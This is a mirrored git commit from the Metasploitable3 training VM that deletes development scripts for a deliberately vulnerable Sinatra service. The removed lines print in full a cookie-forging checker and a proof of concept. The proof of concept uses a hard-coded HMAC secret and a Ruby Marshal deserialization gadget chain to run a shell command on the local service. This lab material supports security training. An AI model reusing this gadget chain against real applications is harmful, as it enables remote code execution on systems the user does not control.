mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-07-05 03:05:51 +02:00
Delete files that are not needed anymore
This commit is contained in:
parent
541e39430b
commit
418d7f7ae3
@ -9,13 +9,6 @@ Since this is a custom application, the Metasploitable player is required to
|
||||
figure out what the secret is (remotely, not through code reading), and write
|
||||
an exploit from scratch.
|
||||
|
||||
For development purposes, you can use the following scripts to test the
|
||||
vulnerable service:
|
||||
|
||||
* check.rb - This will check if the application is vulnerable.
|
||||
* poc.rb - This will attempt to exploit the application. It will create a
|
||||
file named /tmp/your_id.txt
|
||||
|
||||
==============
|
||||
Usage
|
||||
==============
|
||||
|
@ -1,26 +0,0 @@
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This will check our vulnerable app to see if it's vulnerable or not.
|
||||
# It does so by predicting the hash in the cookie.
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
cli = Net::HTTP.new('127.0.0.1', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
res = cli.request(req)
|
||||
cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || ''
|
||||
data, hash = cookie.split('--')
|
||||
puts "[*] Found hash: #{hash}"
|
||||
puts "[*] Attempting to recreate the same hash with secret: #{SECRET}"
|
||||
expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data))
|
||||
puts "[*] Predicted hash: #{expected_hash}"
|
||||
|
||||
if expected_hash == hash
|
||||
puts "[*] Yay! we can predict the hash. The server is vulnerable."
|
||||
end
|
@ -1,34 +0,0 @@
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
#
|
||||
# This PoC will inject Ruby code in our vulnerable app.
|
||||
# It will run the system command "id", and save the output in /tmp/your_id.txt
|
||||
#
|
||||
|
||||
require 'openssl'
|
||||
require 'cgi'
|
||||
require 'net/http'
|
||||
|
||||
SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
|
||||
|
||||
module Erubis;class Eruby;end;end
|
||||
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
|
||||
|
||||
erubis = Erubis::Eruby.allocate
|
||||
erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
|
||||
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
|
||||
proxy.instance_variable_set :@instance, erubis
|
||||
proxy.instance_variable_set :@method, :result
|
||||
proxy.instance_variable_set :@var, "@result"
|
||||
|
||||
session = { 'session_id' => '', 'exploit' => proxy }
|
||||
|
||||
dump = [ Marshal.dump(session) ].pack('m')
|
||||
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
|
||||
cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
|
||||
|
||||
http = Net::HTTP.new('127.0.0.1', 8181)
|
||||
req = Net::HTTP::Get.new('/')
|
||||
req['Cookie'] = cookie
|
||||
res = http.request(req)
|
||||
puts "Done"
|
@ -13,7 +13,7 @@ directory '/opt/sinatra' do
|
||||
mode '0777'
|
||||
end
|
||||
|
||||
['Gemfile', 'README.txt', 'check.rb', 'poc.rb', 'start.sh', 'server.rb'].each do |fname|
|
||||
['Gemfile', 'README.txt', 'start.sh', 'server.rb'].each do |fname|
|
||||
cookbook_file "/opt/sinatra/#{fname}" do
|
||||
source "sinatra/#{fname}"
|
||||
mode '0777'
|
||||
|
Loading…
Reference in New Issue
Block a user